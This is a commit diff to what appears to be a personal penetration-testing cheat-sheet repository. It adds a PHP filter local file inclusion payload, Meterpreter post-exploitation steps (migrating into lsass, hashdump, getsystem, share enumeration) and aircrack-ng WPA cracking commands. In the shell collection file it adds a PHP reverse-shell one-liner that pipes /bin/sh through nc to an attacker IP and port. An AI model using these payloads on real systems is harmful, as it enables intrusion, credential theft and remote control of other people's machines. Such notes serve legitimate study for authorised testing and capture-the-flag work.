bump

exploit/web/local_file_inclusion.md

@@ -30,4 +30,9 @@ curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host:
     ```HTTP
     curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
     ```
+### Base64 Encoding via PHP
+* Circumvent filter via encoding local files included ins a GET parameter value
+```http
+curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<fileOnServer>.php
+```
 

metasploit.md

@@ -66,9 +66,30 @@ use multi/http/apache_mod_cgi_bash_env_exec
 ```
 
 ## Post Exploitation
+* `load kiwi`
+* `load python`
 * Windows
-    * `load kiwi`
+    * list SAM database
-    * `hashdump`
+    ```sh
+    migrate <lsass.exe-PID>
+    hashdump
+    ```
+    * enum shares
+    ```sh
+    post/windows/gather/enum_shares
+    ```
 * Linux
     * `use post/linux/gather/hashdump`
 
+## Other Meterpreter stuff
+* Staged and in disguise running as another servicename
+```
+getpid
+ps
+``` 
+* Attempt to elevate privileges
+```sh
+getsystem
+```
+* Use `multi/handler` or exploit and get an overview via `show payloads`
+* UserID via `getuid`

misc/wifi/airmon-ng.md

@@ -0,0 +1,20 @@
+# aircrack-ng
+
+## airmon-ng
+
+* Monitor on interface
+```sh
+airmon-ng start <interface>
+```
+
+## airodump-ng
+* Capture traffic
+
+
+## aircrack-ng
+* Use captured network traffic to crack
+* Specify targets via common options 
+* Create hashcap files as `HCCAPX` or `HCCAP`
+```sh
+aircrack-ng -w <wordlist> -b <bssidFromCapture> -j <outputHashcatFile> <INPUTFILE>
+```

reverse_shells/docs/shell_collection.md

@@ -29,3 +29,9 @@ python -c 'import pty; pty.spawn("/bin/bash")'
 * `ssh-keygen`
 * copy priv key and `chmod 600`
 * `cat id_rsa.pub > authorized_keys` on target
+
+## As Code
+### PHP
+```sh
+<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-IP> <attacker-PORT> > /tmp/f') ?>
+```